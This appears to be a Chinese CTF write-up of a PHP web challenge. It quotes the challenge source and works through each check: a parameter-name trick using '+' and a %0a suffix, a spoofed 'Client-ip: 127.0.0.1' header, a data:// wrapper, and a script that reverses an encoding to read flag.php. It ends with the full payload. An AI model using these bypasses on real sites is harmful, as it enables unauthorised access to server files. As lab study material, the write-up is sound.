知识点:Client-ip,data://,
<!--
//1st
$query = $_SERVER['QUERY_STRING'];//获取参数
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
//参数中不能有_和%5f
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
//$_GET['b_u_p_t']要不等于23333且要符合正则
echo "you are going to the next ~";
}
!-->
我们可以传个b+u+p+t=23333%0a
,因为php在解析变量名的时候会把+、%20、*、{、[解析为_,具体可以看:https://www.freebuf.com/articles/web/213359.html
有一段fuckjs代码,可以放到Console里面运行。
告诉我们要post传个Merak
可以看到它有三个地方过滤:
第一个:ip为127.0.0.1,可以在请求头这边加一个Client-ip:127.0.0.1
,Client-ip为我们的请求ip。
第二个:file_get_contents($_GET['2333']) === 'todat is a happy day'
我们可以用data伪协议来过。
第三个:change($v)
可以把它反过来输出一下。
<?php
//过change
$v="flag.php";
$re="";
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) - $i*2 );
}
echo base64_encode($re);
?>
<?php
//secrettw.php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>
构造payload:(最好在bp里传)
GET:?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI=
POST:Merak=1
http请求头:Client-ip:127.0.0.1
得到flag